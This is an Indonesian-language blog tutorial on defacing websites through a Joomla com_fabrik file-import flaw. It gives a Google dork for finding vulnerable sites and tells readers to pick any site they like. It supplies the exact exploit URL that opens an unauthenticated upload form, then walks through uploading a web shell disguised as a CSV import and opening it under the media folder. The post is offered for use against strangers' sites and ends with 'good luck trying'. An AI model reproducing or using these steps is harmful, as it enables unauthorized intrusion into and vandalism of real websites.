Sunday 12 January 2014

Cara Deface Web Dengan Exploit Com Fabrik

0 comments

Cara yang satu ini cukup mudah dilakukan. Dengan menggunakan exploit com_fabrik, kita bisa mengupload shell kita untuk melakukan deface terhadap web tersebut.


Tutornya :

1. Ketik dork berikut ke google : "inurl:index.php?option=com_fabrik" *tanpa tanda kutip (")

2. Akan ada banyak web. Anda buka terserah yang mana anda mau.

3. Setelah dibuka. Masukkan exploit ini :
"index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1" *tanpa tanda kutip (")
Contoh :
www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

4. Jika tidak berhasil cari target lain dan jika berhasil akan muncul form upload seperti ini :


5. Klik "Choose File" trus masukan shell kamu, dan langsung klik "Import CSV" untuk mengupload

6. Jika sudah, buka shell anda dengan format www.site.com/media/namashellkamu.html

7. Dan muncullah shell kesayangan anda. Namun jika tidak muncul, itu karena web tersebut tidak mendukung file berformat php maupun html.

Sekian ilmu yang dapat saya berikan.
Selamat mencoba :)

English French Spain Italian Dutch Russian Brazil Japanese Korean Arabic German Chinese Simplified
Share on :

Artikel Terkait:

Leave a Reply